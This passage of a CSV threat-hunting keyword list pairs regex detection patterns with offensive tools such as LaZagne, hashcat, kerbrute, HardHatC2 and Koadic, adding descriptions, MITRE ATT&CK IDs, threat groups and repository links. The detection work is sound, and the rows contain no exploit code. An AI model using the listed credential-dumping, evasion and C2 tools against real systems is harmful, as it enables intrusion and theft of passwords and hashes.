TA0002","N/A","N/A","Exploitation tools","https://github.com/hacksysteam/CVE-2023-21608","1","1","N/A","N/A","3","263","59","2023-12-05T12:21:02Z","2023-01-30T12:57:48Z" "*HackTheWorld*",".{0,1000}HackTheWorld.{0,1000}","offensive_tool_keyword","HackTheWorld","A Python Script For Generating Payloads that Bypasses All Antivirus so far.","T1566 - T1106 - T1027 - T1059 - T1070","TA0002 - TA0005 - TA0008 - TA0011","N/A","N/A","Defense Evasion","https://github.com/stormshadow07/HackTheWorld","1","0","N/A","N/A","10","913","174","2024-01-19T12:11:39Z","2018-02-17T11:46:40Z" "*Hacktool.Lazagne*",".{0,1000}Hacktool\.Lazagne.{0,1000}","offensive_tool_keyword","LaZagne","The LaZagne project is an open source application used to retrieve lots of passwords stored on a local computer. Each software stores its passwords using different techniques (plaintext APIs custom algorithms databases etc.). This tool has been developed for the purpose of finding these passwords for the most commonly-used software.","T1552 - T1003 - T1555","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/AlessandroZ/LaZagne","1","1","N/A","10","10","9094","2003","2024-01-18T10:51:17Z","2015-02-16T14:10:02Z" "*hacktools-*.xpi*",".{0,1000}hacktools\-.{0,1000}\.xpi.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5452","618","2024-02-24T00:10:34Z","2020-06-22T21:42:16Z" "*hack-tools/cmbndhnoonmghfofefkcccljbkdpamhi*",".{0,1000}hack\-tools\/cmbndhnoonmghfofefkcccljbkdpamhi.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web 
Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5452","618","2024-02-24T00:10:34Z","2020-06-22T21:42:16Z" "*Hack-Tools-master*",".{0,1000}Hack\-Tools\-master.{0,1000}","offensive_tool_keyword","hack-tools","The all-in-one Red Team browser extension for Web Pentester","T1059.007 - T1505 - T1068 - T1216 - T1547.009","TA0002 - TA0001 - TA0009","N/A","N/A","Web Attacks","https://github.com/LasCC/Hack-Tools","1","1","N/A","9","10","5452","618","2024-02-24T00:10:34Z","2020-06-22T21:42:16Z" "*Hack-with-Github*",".{0,1000}Hack\-with\-Github.{0,1000}","offensive_tool_keyword","Github Username","An Open Source Hacking Tools database","N/A","N/A","N/A","N/A","Exploitation tools","https://github.com/Hack-with-Github","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*hades_directsys.exe*",".{0,1000}hades_directsys\.exe.{0,1000}","offensive_tool_keyword","hades","Go shellcode loader that combines multiple evasion techniques","T1055 - T1027 - T1218 - T1027.001 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation tools","https://github.com/f1zm0/hades","1","1","N/A","N/A","4","318","45","2023-06-21T19:22:57Z","2022-10-11T08:16:24Z" "*HadesLdr-main*",".{0,1000}HadesLdr\-main.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","10","3","275","41","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z" "*Hagrid29/DumpAADSyncCreds*",".{0,1000}Hagrid29\/DumpAADSyncCreds.{0,1000}","offensive_tool_keyword","DumpAADSyncCreds","C# implementation of Get-AADIntSyncCredentials from AADInternals which extracts Azure AD Connect credentials to AD and Azure AD from AAD connect database.","T1555 - T1110","TA0006 - TA0001","N/A","N/A","Credential 
Access","https://github.com/Hagrid29/DumpAADSyncCreds","1","1","N/A","10","1","33","3","2023-06-24T16:17:36Z","2022-03-27T18:43:44Z" "*Hak5 Cloud C?*",".{0,1000}Hak5\sCloud\sC\?.{0,1000}","offensive_tool_keyword","Hak5 Cloud C2","Hak5 Cloud C2 web title","T1071.001","TA0011","N/A","N/A","C2","https://shop.hak5.org/products/c2","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*hak5/omg-payloads*",".{0,1000}hak5\/omg\-payloads.{0,1000}","offensive_tool_keyword","omg-payloads","Official payload library for the O.MG line of products from Mischief Gadgets","T1200 - T1095 - T1059.006 - T1027","TA0010 - TA0011","N/A","N/A","Hardware","https://github.com/hak5/omg-payloads","1","1","N/A","10","7","698","247","2024-04-28T21:51:02Z","2021-09-08T20:33:18Z" "*hakaioffsec/CVE-2024-21338*",".{0,1000}hakaioffsec\/CVE\-2024\-21338.{0,1000}","offensive_tool_keyword","POC","Local Privilege Escalation from Admin to Kernel vulnerability on Windows 10 and Windows 11 operating systems with HVCI enabled.","T1055.011 - T1548.002","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/hakaioffsec/CVE-2024-21338","1","1","N/A","9","3","207","48","2024-04-16T21:00:14Z","2024-04-13T05:53:02Z" "*haKCers.txt*",".{0,1000}haKCers\.txt.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*hakluke/hakrawler*",".{0,1000}hakluke\/hakrawler.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*hakrawler -*",".{0,1000}hakrawler\s\-.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*hakrawler.go*",".{0,1000}hakrawler\.go.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*hakrawler@latest*",".{0,1000}hakrawler\@latest.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web 
Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*hakrawler-ip-range*",".{0,1000}hakrawler\-ip\-range.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","1","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*hakrawler-master*",".{0,1000}hakrawler\-master.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","1","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*haktrails subdomains*",".{0,1000}haktrails\ssubdomains.{0,1000}","offensive_tool_keyword","hakrawler","Simple fast web crawler designed for easy and quick discovery of endpoints and assets within a web application","T1190 - T1212 - T1087.001","TA0007 - TA0003 - TA0009","N/A","N/A","Web Attacks","https://github.com/hakluke/hakrawler","1","0","N/A","6","10","4236","474","2024-01-23T10:58:14Z","2019-12-15T13:54:43Z" "*Hakumarachi/Bropper*",".{0,1000}Hakumarachi\/Bropper.{0,1000}","offensive_tool_keyword","bropper","An automatic Blind ROP exploitation tool ","T1068 - T1059.003 - T1140","TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/Hakumarachi/Bropper","1","1","N/A","N/A","2","180","18","2023-06-09T12:40:05Z","2023-01-20T14:09:19Z" "*handelsregister-get-company-names *",".{0,1000}handelsregister\-get\-company\-names\s.{0,1000}","offensive_tool_keyword","thoth","Automate recon for red team assessments.","T1190 - T1083 - T1018","TA0007 - TA0043 - 
TA0001","N/A","N/A","Reconnaissance","https://github.com/r1cksec/thoth","1","0","N/A","7","1","84","11","2024-03-01T11:51:24Z","2021-11-15T13:40:56Z" "*handle_nessus_file*",".{0,1000}handle_nessus_file.{0,1000}","offensive_tool_keyword","crackmapexec","function name from nessus.py from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","0","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*handlekatz.py*",".{0,1000}handlekatz\.py.{0,1000}","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*handlekatz.x64.*",".{0,1000}handlekatz\.x64\..{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - 
T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*handlekatz_bof.*",".{0,1000}handlekatz_bof\..{0,1000}","offensive_tool_keyword","cobaltstrike","A BOF port of the research of @thefLinkk and @codewhitesec","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com//EspressoCake/HandleKatz_BOF","1","1","N/A","10","N/A","N/A","N/A","N/A","N/A" "*handlekatz_dump*",".{0,1000}handlekatz_dump.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration 
and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","N/A","Network Exploitation Tools","https://github.com/lefayjey/linWinPwn","1","1","N/A","10","10","1698","250","2024-04-20T09:16:28Z","2021-12-16T22:13:10Z" "*HANDLEKATZ_EXE_NAME=*",".{0,1000}HANDLEKATZ_EXE_NAME\=.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","0","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*handshake*jasmin@123*",".{0,1000}\""handshake\"",\s\""jasmin\@123\"".{0,1000}","offensive_tool_keyword","Jasmin-Ransomware","Jasmin Ransomware is an advanced red team tool (WannaCry Clone) used for simulating real ransomware attacks","T1486","TA0040 - TA0002 - TA0010","N/A","N/A","Ransomware","https://github.com/codesiddhant/Jasmin-Ransomware","1","0","N/A","10","2","186","68","2021-03-01T14:51:06Z","2021-02-27T07:09:08Z" "*Hangingsword/HouQing*",".{0,1000}Hangingsword\/HouQing.{0,1000}","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - 
TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Hangingsword/HouQing","1","1","N/A","10","10","205","60","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z" "*HardHatC2*",".{0,1000}HardHatC2.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*hardhatc2.com*",".{0,1000}hardhatc2\.com.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*HardHatC2Client*",".{0,1000}HardHatC2Client.{0,1000}","offensive_tool_keyword","HardHatC2","A C# Command & Control framework","T1021 - T1055 - T1071 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/DragoQCC/HardHatC2","1","1","N/A","10","10","907","125","2024-03-28T02:30:02Z","2022-12-08T19:40:47Z" "*HarmJ0y/DAMP*",".{0,1000}HarmJ0y\/DAMP.{0,1000}","offensive_tool_keyword","DAMP","The Discretionary ACL Modification Project: Persistence Through Host-based Security Descriptor Modification.","T1222 - T1222.002 - T1548 - T1548.002","TA0005 ","N/A","N/A","Persistence","https://github.com/HarmJ0y/DAMP","1","1","N/A","10","4","373","78","2019-07-25T21:18:37Z","2018-04-06T22:13:58Z" "*HarvestBrowserPasswords.exe*",".{0,1000}HarvestBrowserPasswords\.exe.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in 
post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*HarvestBrowserPasswords.pdb*",".{0,1000}HarvestBrowserPasswords\.pdb.{0,1000}","offensive_tool_keyword","redpill","Assist reverse tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/r00t-3xp10it/redpill","1","1","N/A","10","3","210","53","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z" "*harvestcrop.exe * *",".{0,1000}harvestcrop\.exe\s.{0,1000}\s.{0,1000}","offensive_tool_keyword","Farmer","Farmer is a project for collecting NetNTLM hashes in a Windows domain. Farmer achieves this by creating a local WebDAV server that causes the WebDAV Mini Redirector to authenticate from any connecting clients.","T1557.001 - T1056.004 - T1078.003","TA0006 - TA0004 - TA0001","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/mdsecactivebreach/Farmer","1","0","N/A","10","4","331","54","2021-04-28T15:27:24Z","2021-02-22T14:32:29Z" "*has no pre auth required. 
Dumping hash to crack offline:*",".{0,1000}has\sno\spre\sauth\srequired\.\sDumping\shash\sto\scrack\soffline\:.{0,1000}","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110.003 - T1558.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","10","10","2415","394","2024-02-22T11:37:57Z","2019-02-03T18:21:17Z" "*HasAutoAdminLogonCredentials*",".{0,1000}HasAutoAdminLogonCredentials.{0,1000}","offensive_tool_keyword","adalanche","Active Directory ACL Visualizer and Explorer - who's really Domain Admin?","T1484 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/lkarlslund/Adalanche","1","0","AD Enumeration","10","10","1540","144","2024-03-20T16:05:19Z","2020-10-07T10:07:22Z" "*hash3liZer/SillyRAT*",".{0,1000}hash3liZer\/SillyRAT.{0,1000}","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","1","N/A","N/A","7","670","152","2023-12-09T00:42:07Z","2020-05-10T17:37:37Z" "*hash3liZer/wifijammer*",".{0,1000}hash3liZer\/wifijammer.{0,1000}","offensive_tool_keyword","wifijammer","wifijammer","T1497 - T1498 - T1499","TA0040","N/A","N/A","Sniffing & Spoofing","https://github.com/hash3liZer/wifijammer","1","1","N/A","N/A","2","188","43","2021-06-10T12:33:49Z","2018-01-20T16:26:45Z" "*Hash-Buster*",".{0,1000}Hash\-Buster.{0,1000}","offensive_tool_keyword","Hash-Buster","hash cracking tool ","T1201 - T1110 - T1021","TA0001 - TA0002 - TA0006","N/A","N/A","POST Exploitation tools","https://github.com/s0md3v/Hash-Buster","1","1","N/A","N/A","10","1654","383","2023-04-11T09:43:06Z","2017-07-03T17:28:51Z" "*hashcat*",".{0,1000}hashcat.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - 
T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","0","N/A","10","10","19908","2745","2024-04-20T17:36:13Z","2015-12-04T14:46:51Z" "*hashcat-*.7z*",".{0,1000}hashcat\-.{0,1000}\.7z.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","19908","2745","2024-04-20T17:36:13Z","2015-12-04T14:46:51Z" "*hashcat.git*",".{0,1000}hashcat\.git.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","19908","2745","2024-04-20T17:36:13Z","2015-12-04T14:46:51Z" "*hashcat/hashcat*",".{0,1000}hashcat\/hashcat.{0,1000}","offensive_tool_keyword","hashcat","Worlds fastest and most advanced password recovery utility.","T1110.001 - T1003.001 - T1021.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/hashcat/hashcat","1","1","N/A","10","10","19908","2745","2024-04-20T17:36:13Z","2015-12-04T14:46:51Z" "*hashcat-rule-master*",".{0,1000}hashcat\-rule\-master.{0,1000}","offensive_tool_keyword","hashcat-rule","Rule for hashcat or john. 
Aiming to crack how people generate their password","T1110.002 - T1021.001","TA0006 - TA0001","N/A","N/A","Credential Access","https://github.com/clem9669/hashcat-rule","1","1","N/A","10","4","374","44","2024-04-02T12:03:31Z","2020-03-06T17:20:40Z" "*hashdump.py*",".{0,1000}hashdump\.py.{0,1000}","offensive_tool_keyword","donpapi","Dumping DPAPI credentials remotely","T1003.006 - T1021.001","TA0006 - TA0008","N/A","N/A","Credential Access","https://github.com/login-securite/DonPAPI","1","0","N/A","N/A","9","811","100","2024-04-18T05:54:07Z","2021-09-27T09:12:51Z" "*hashdump.rb*",".{0,1000}hashdump\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*hashdump.x64.dll*",".{0,1000}hashdump\.x64\.dll.{0,1000}","offensive_tool_keyword","Pyramid","a tool to help operate in EDRs' blind spots","T1055 - T1106 - T1127 - T1129 - T1559","TA0002 - TA0005 - TA0003","N/A","N/A","Defense Evasion","https://github.com/naksyn/Pyramid","1","1","N/A","10","7","613","71","2024-04-03T22:51:28Z","2022-08-13T11:51:37Z" "*hashdump_sam*",".{0,1000}hashdump_sam.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*HashDumpDCImplant*",".{0,1000}HashDumpDCImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. 
The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*HashDumpSAMImplant*",".{0,1000}HashDumpSAMImplant.{0,1000}","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*hashedBootKey CheckSum failed, Syskey startup password probably in use! 
:(*",".{0,1000}hashedBootKey\sCheckSum\sfailed,\sSyskey\sstartup\spassword\sprobably\sin\suse!\s\:\(.{0,1000}","offensive_tool_keyword","gosecretsdump","Dump ntds.dit really fast","T1003","TA0006","N/A","N/A","Credential Access","https://github.com/C-Sto/gosecretsdump","1","0","N/A","10","4","354","48","2021-10-01T09:11:33Z","2018-12-24T05:54:19Z" "*hasherezade/exe_to_dll*",".{0,1000}hasherezade\/exe_to_dll.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts a EXE into DLL","T1027.004 - T1059.001","TA0002 - TA0005","N/A","N/A","Defense Evasion","https://github.com/hasherezade/exe_to_dll","1","1","N/A","5","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*hasherezade/exe_to_dll*",".{0,1000}hasherezade\/exe_to_dll.{0,1000}","offensive_tool_keyword","exe_to_dll","Converts an EXE so that it can be loaded like a DLL.","T1055.002 - T1073.001 - T1027","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/hasherezade/exe_to_dll","1","1","N/A","8","10","1185","181","2023-07-26T11:41:27Z","2020-04-16T16:27:00Z" "*hasherezade/persistence_demos*",".{0,1000}hasherezade\/persistence_demos.{0,1000}","offensive_tool_keyword","persistence_demos","Demos of various (also non standard) persistence methods used by malware","T1546 - T1547 - T1133 - T1053 - T1037","TA0003 ","N/A","N/A","Persistence","https://github.com/hasherezade/persistence_demos","1","1","N/A","7","3","215","47","2023-03-05T17:01:14Z","2017-05-16T09:08:47Z" "*-hashes* --escalate-user*",".{0,1000}\-hashes.{0,1000}\s\-\-escalate\-user.{0,1000}","offensive_tool_keyword","krbrelayx","Kerberos unconstrained delegation abuse toolkit","T1558.003 - T1098","TA0004 - TA0006","N/A","N/A","Exploitation 